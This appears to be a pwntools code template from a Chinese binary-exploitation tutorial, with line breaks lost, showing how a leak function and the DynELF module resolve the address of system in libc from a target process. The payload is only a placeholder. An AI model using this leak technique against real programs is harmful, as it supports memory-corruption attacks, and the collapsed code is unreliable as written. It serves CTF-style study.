p = process('./xxx')def leak(address):#各种预处理payload = "xxxxxxxx" + address + "xxxxxxxx"p.send(payload)#各种处理data = p.recv(4)log.debug("%#x => %s" % (address, (data or '').encode('hex')))return datad = DynELF(leak, elf=ELF("./xxx")) #初始化DynELF模块systemAddress = d.lookup('system', 'libc') #在libc文件中搜索system函数的地址
